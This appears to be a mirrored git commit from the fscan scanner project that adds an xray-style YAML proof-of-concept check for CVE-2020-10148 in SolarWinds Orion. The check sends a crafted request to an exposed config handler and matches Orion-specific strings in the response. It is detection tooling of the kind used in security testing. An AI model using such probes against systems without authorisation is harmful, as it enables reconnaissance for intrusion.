mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-27 05:31:53 +08:00
优化xray解析模块,支持groups、新增poc
This commit is contained in:
@@ -0,0 +1,13 @@
|
||||
name: poc-yaml-solarwinds-cve-2020-10148
|
||||
set:
|
||||
r1: randomInt(800000000, 1000000000)
|
||||
rules:
|
||||
- method: GET
|
||||
path: /web.config.i18n.ashx?l=en-US&v={{r1}}
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(bytes("SolarWinds.Orion.Core.Common")) && response.body.bcontains(bytes("/Orion/NetPerfMon/TemplateSiblingIconUrl"))
|
||||
detail:
|
||||
author: su(https://suzzz112113.github.io/#blog)
|
||||
CVE: CVE-2020-10148
|
||||
links:
|
||||
- https://kb.cert.org/vuls/id/843464
|
||||
Reference in New Issue
Block a user